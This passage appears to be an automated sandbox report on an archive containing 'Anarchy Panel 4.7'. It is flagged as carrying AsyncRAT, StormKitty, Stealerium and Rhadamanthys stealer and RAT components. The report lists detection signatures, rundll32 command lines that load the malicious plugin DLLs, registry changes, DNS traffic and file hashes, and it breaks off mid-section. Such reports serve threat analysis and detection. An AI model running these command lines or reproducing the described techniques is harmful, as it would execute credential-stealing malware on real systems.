Malware Analysis Report

2024-10-23 19:20

Sample ID 230719-ayb4saeg84
Target s.rar
SHA256 d531f8fe97a22396c8569bc48eea4a808f36631466770d170095ffcc41c50f0e
Tags
rat asyncrat stormkitty stealerium rhadamanthys evasion persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d531f8fe97a22396c8569bc48eea4a808f36631466770d170095ffcc41c50f0e

Threat Level: Known bad

The file s.rar was found to be: Known bad.

Malicious Activity Summary

rat asyncrat stormkitty stealerium rhadamanthys evasion persistence stealer

Async RAT payload

Stealerium family

Suspicious use of NtCreateUserProcessOtherParentProcess

StormKitty payload

Rhadamanthys

Stormkitty family

Detect rhadamanthys stealer shellcode

Asyncrat family

Blocklisted process makes network request

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-19 00:36

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

Stealerium family

stealerium

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral21

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1563s

Max time network

1567s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\RssCnLKcGRxj.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1565s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\fzAgyDYa.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

802s

Max time network

1131s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mGWHaG2Jn.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 1.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\mML6WKMqdxjDGA.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1559s

Max time network

1562s

Command Line

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

Signatures

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20805a37d9b9d901 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "396491998" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{61B24061-25CC-11EE-A97A-5E587CD0922C} = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000081fc177b9287ed4a8181eac127bbbd69000000000200000000001066000000010000200000001cf0b4088ed36ad859cc95f6426934e3b4cc014dbaee2abccc48d757cebbe47c000000000e8000000002000020000000764f810b931477111a3c83e8d70260f44da3b229f34dad71c9619edac74f2c17200000003482da31c59790cb62cc00fc2fa41408aa84820fd84ce5ae0a9ad0326ef82a43400000004e81a7c147764b7abd43dec19c0d79b4157602e7c9cff3e768859f294684576a6c360ec0ca8d4b245baa62fd575d22d599404e720fef31efaeab55d52b2ededd C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [binary value not preserved in this copy of the report] C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-377084978-2088738870-2818360375-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 1688 wrote to memory of 2940 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE C:\Program Files (x86)\Internet Explorer\iexplore.exe
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2940 wrote to memory of 2984 N/A C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2984 wrote to memory of 2968 N/A C:\Program Files\Internet Explorer\IEXPLORE.EXE C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Anarchy Panel.exe.xml"

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome

C:\Program Files\Internet Explorer\IEXPLORE.EXE

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2984 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab9741.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\Tar985F.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7cd10d63c58abab932977b550be96c7d
SHA1 070d242fc171a0e46f1f6c17a105669a7c0f7212
SHA256 cbb44dd4d858e5ec9a83a8a8f3036e3b3e360e3de296a324d2f163bb617fa195
SHA512 79dda8cd8417a28807dec51fe2b9495268e7d1e88b4ab383e62baba46ae9678a8a39d2240da799996bfbdf7b8831ae16a6ff4920d697714a866d707d7e577939

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f94c9f0396b1ec6520a853dabbd8e183
SHA1 d41d58279f017a060aeea7ca4df39b41b976070c
SHA256 5147e09fc1796c0daee9b64b27c66b15b97b727c124704888d8d2cd023de7052
SHA512 f22e57ca79e0692c85434cb8942d1d21b281859a4fc6663552ad5a99d785e24fbe70002a1d17e4e3bd80125299f28d9ab0326700e3e9c2cf38cbbe24de2c82b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 96e309b7e1715574a74bcd21e3d64bbf
SHA1 376f2419e8812ead26141871331abe92ce4416f4
SHA256 8b853a9863a87254514bd5e5d8161ca44575aa937ef4b07dd935765f4ac11caf
SHA512 8329825df35a1ea9b159d1066c6e3f1bba11ba4532aba684b0ccdd7e03569005e2867fbdf5a2f3698361cde0aca3e49dd5d16ab80996df84238d942103c6fc35

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d063a2a6a109e637c29793d143a8523c
SHA1 b5b59967737a6b6528b01d0b2372bab8b335f281
SHA256 97e96c10bd3b0ca4968718bc49a7349f39359608989809c37de4fc3e6ac27fce
SHA512 aeb3a34903f3d73c8a4f79a0b774571826c29ff726d4020c231824ee30e0d6c8bef1801f644102792b4c864de9a39572d5f864bd44ddf6b3756c212e966f1130

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 812b1fd65e07405b366c61df99f4e585
SHA1 0dfbeee834646ca59f3ad311a94fe62efab4c905
SHA256 77197e7b937ea5eba4f3af471c9f9282c7302c23d1837fe062ec396c9a4b8b24
SHA512 b23dc73346b8773326a75482f2852d3925d966b1d16ea96b08aa92b56320db596c6a1da86b3dc91cff4305ccdd27c9132ed5cb9c6e92c40c80ffdd0ece6d104a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 719d7eb33c44ad7b08b6d8fdad8c1b2b
SHA1 80452aa5e8e6348fd4cb3b9c7bb1230ae37ebd94
SHA256 0a20f303b6a073798dcd56f0046f8a1cf2710414f260800599b069959ea6b5d6
SHA512 3cf8e907308d02246c2df7b5b7cfc0e44c24f633a85e4d22b17564101f92b2cb05de93aed1bcd152556202b85f6eafd23cc69b02ec4290cfab0bb4ccb75c6da5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 01bcf6985ccdc4e3d11bbd2ffec444a5
SHA1 022e2cfacbb800cca63d43397576b60ff296902f
SHA256 dfa0bfebc992dd7a6586942df2d05d5a3706bd871e478d5c8a2cc0c366dd3710
SHA512 92e4da814d55004ef1af3d7bb10d5cd110423a781ea227ec7d8ebf02d5b8210b17aa26b6f96ff0fb8f7573dd87c23411b92009632948a2cdbfdc9df368df9f87

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 92b8b0c8a144d74c1cdcc8586e2dc523
SHA1 f9c4f6d7e7a416202d95c15fe605fe499e85f20c
SHA256 1df741becf2fa9f9ad0029c401876fec8531e3482bff5604e1d7eba2ce773950
SHA512 fd47a0305caca4a03d581ca596023869410ab584e7c494716f7270c3b6c260a8e05439992462fd6f27019640901c9ccf630342542a47ee3b621d188bbdf734d3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 91aad0c4911713ddaf4f95024a9c12f5
SHA1 2a29446efef296239a12ce5bee3d14a5f880fee3
SHA256 665f19b0cd501aac7606ad802beb7640dae14a32e160f2013773f41379aab533
SHA512 84e35749533d1402ac3fd8fd65ca372842ef02b9fb93bf872ba616999752cfe6470771cf70b520ce19c4043c8a308949245b58447521ec2784799ee26ed8c1a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\977QBXKR\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\WMIXVVC4.txt

MD5 358763a5ae28b2285b8c691688a9286e
SHA1 7d2cfa62517e614f0523595748188e2f25cbe718
SHA256 b5297fe487bfa7911d9e18632f0c3bd5fa73c0a708943fffb54da8fdbba6c29f
SHA512 e0d2f629d3db1bb0d48a82f74b6d15db577a35220ff43861802e102f5dcac69277cb076a9daf92f1c78325b8a49f53d7fef965a411def630f8e67945a78cadec

Analysis: behavioral17

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win10v2004-20230703-en

Max time kernel

1158s

Max time network

1164s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\KNTmoSnG.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 216.74.101.95.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1558s

Max time network

1564s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\WkUP83aP9CABpi.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1561s

Max time network

1565s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\0guo3zbo66fqoG.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

Platform

win7-20230712-en

Max time kernel

1563s

Max time network

1566s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Anarchy Panel 4.7\Plugins\EVa7gBMKoaHmLC.dll",#1

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2023-07-19 00:36

Reported

2023-07-19 01:07

